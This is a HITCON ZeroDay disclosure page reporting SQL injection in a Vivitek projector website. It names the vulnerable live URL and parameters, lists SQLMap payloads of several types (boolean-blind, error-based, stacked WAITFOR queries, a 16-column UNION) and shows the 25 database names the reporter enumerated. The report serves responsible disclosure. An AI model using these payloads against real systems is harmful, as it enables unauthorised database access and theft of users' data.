Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2020-00378
- 發信 Vendor: 台達集團
- Title: 麗訊投影機官網存在SQL injection漏洞
- Introduction: sql injection (GET)
處理狀態
目前狀態
公開
Last Update : 2020/08/20
-
新提交
-
已審核
-
已通報
-
未回報修補狀況
-
未複測
-
公開
處理歷程
- 2020/06/20 00:00:36 : 新提交 (由 wqwfeoipwqjfpwiejfdpioqweoifjqwf 更新此狀態)
- 2020/06/20 00:01:03 : 新提交 (由 wqwfeoipwqjfpwiejfdpioqweoifjqwf 更新此狀態)
- 2020/06/20 00:04:37 : 新提交 (由 wqwfeoipwqjfpwiejfdpioqweoifjqwf 更新此狀態)
- 2020/06/21 22:58:14 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2020/06/22 14:47:03 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2020/06/22 14:47:03 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2020/06/22 14:47:03 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2020/08/20 03:00:05 : 公開 (由 HITCON ZeroDay 平台自動更新)
詳細資料
- ZDID:ZD-2020-00378
- 通報者:lebr0n_li (wqwfeoipwqjfpwiejfdpioqweoifjqwf)
- 風險:高
- 類型:資料庫注入攻擊 (SQL Injection)
參考資料
攻擊者可利用該漏洞取得後端資料庫權限及完整資料(包含大量使用者個資或敏感性資料),同時也有機會對資料進行破壞或修改。
漏洞說明: OWASP - SQL Injection
https://www.owasp.org/index.php/SQL_Injection
漏洞說明: OWASP - Top 10 - 2017 A1 - Injection
https://www.owasp.org/index.php/Top_10-2017_A1-Injection
漏洞說明: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
https://cwe.mitre.org/data/definitions/89.html
防護方式: OWASP - SQL Injection Prevention Cheat Sheet
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
漏洞說明: OWASP - SQL Injection
https://www.owasp.org/index.php/SQL_Injection
漏洞說明: OWASP - Top 10 - 2017 A1 - Injection
https://www.owasp.org/index.php/Top_10-2017_A1-Injection
漏洞說明: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
https://cwe.mitre.org/data/definitions/89.html
防護方式: OWASP - SQL Injection Prevention Cheat Sheet
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)
相關網址
http://www.vivitek.com.tw/distributor.aspx?id=1&classID=1&p=2
敘述
利用google dork發現sql error message
手動測試後發現存在boolean-based blind和union query的漏洞
進一步以SQLMap驗證
1.Parameter: classID (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1&classID=1 AND 1221=1221&p=2
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)
Payload: id=1&classID=1 AND 4490 IN (SELECT (CHAR(113)+CHAR(106)+CHAR(112)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (4490=4490) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(112)+CHAR(98)+CHAR(113)))&p=2
Type: inline query
Title: Generic inline queries
Payload: id=1&classID=(SELECT CONCAT(CONCAT(CHAR(113)+CHAR(106)+CHAR(112)+CHAR(107)+CHAR(113),(CASE WHEN (3677=3677) THEN CHAR(49) ELSE CHAR(48) END)),CHAR(113)+CHAR(106)+CHAR(112)+CHAR(98)+CHAR(113)))&p=2
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: id=1&classID=1;WAITFOR DELAY '0:0:10'--&p=2
Type: time-based blind
Title: Microsoft SQL Server/Sybase time-based blind (IF - comment)
Payload: id=1&classID=1 WAITFOR DELAY '0:0:10'--&p=22.Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 3175=3175&classID=1&p=2
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)
Payload: id=1 AND 8487 IN (SELECT (CHAR(113)+CHAR(106)+CHAR(112)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (8487=8487) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(112)+CHAR(98)+CHAR(113)))&classID=1&p=2
Type: inline query
Title: Generic inline queries
Payload: id=(SELECT CONCAT(CONCAT(CHAR(113)+CHAR(106)+CHAR(112)+CHAR(107)+CHAR(113),(CASE WHEN (5095=5095) THEN CHAR(49) ELSE CHAR(48) END)),CHAR(113)+CHAR(106)+CHAR(112)+CHAR(98)+CHAR(113)))&classID=1&p=2
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: id=1;WAITFOR DELAY '0:0:10'--&classID=1&p=2
Type: time-based blind
Title: Microsoft SQL Server/Sybase time-based blind (IF - comment)
Payload: id=1 WAITFOR DELAY '0:0:10'--&classID=1&p=2
Type: UNION query
Title: Generic UNION query (NULL) - 16 columns
Payload: id=1 UNION ALL SELECT NULL,NULL,CHAR(113)+CHAR(106)+CHAR(112)+CHAR(107)+CHAR(113)+CHAR(107)+CHAR(74)+CHAR(107)+CHAR(65)+CHAR(85)+CHAR(89)+CHAR(105)+CHAR(106)+CHAR(69)+CHAR(72)+CHAR(71)+CHAR(100)+CHAR(74)+CHAR(107)+CHAR(69)+CHAR(118)+CHAR(105)+CHAR(110)+CHAR(70)+CHAR(107)+CHAR(70)+CHAR(67)+CHAR(88)+CHAR(89)+CHAR(101)+CHAR(80)+CHAR(69)+CHAR(118)+CHAR(89)+CHAR(79)+CHAR(67)+CHAR(99)+CHAR(116)+CHAR(85)+CHAR(66)+CHAR(78)+CHAR(113)+CHAR(105)+CHAR(103)+CHAR(107)+CHAR(113)+CHAR(106)+CHAR(112)+CHAR(98)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- VGWj&classID=1&p=2db權限高
可查看db內容
available databases [25]:
[] cardbase
[] ClothesOrder
[] Daliwell
[] DB_ChuanXun
[] DB_dhbj
[] DB_Express2
[] DB_Express_TEST
[] DB_FCUAA
[] DB_jqwl
[] DB_sixBuy
[] DB_steak
[] DB_xingCheng
[] DB_ysExpress1
[] EIP_DataCenter
[] master
[] model
[] msdb
[] MydeltaPlus
[] Olger
[] ProjectDB_OLD
[] ProjectorDB_New
[] tempdb
[] TheOldAssociation
[] Well_world
[*] YUPUPIN
為避免機敏資料外洩
請立即修補!!!
聲明:
本人點到為止並無惡意,免費漏洞檢測的目的是幫助企業、政府機關、學校防止資安問題,並在經驗中累積個人實力
並未利用漏洞深入,請相關單位放心
若有疑慮可立即透過組織帳號與我聯繫,本人願意接受一切合法調查
擷圖
留言討論
登入後留言
聯絡組織
發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。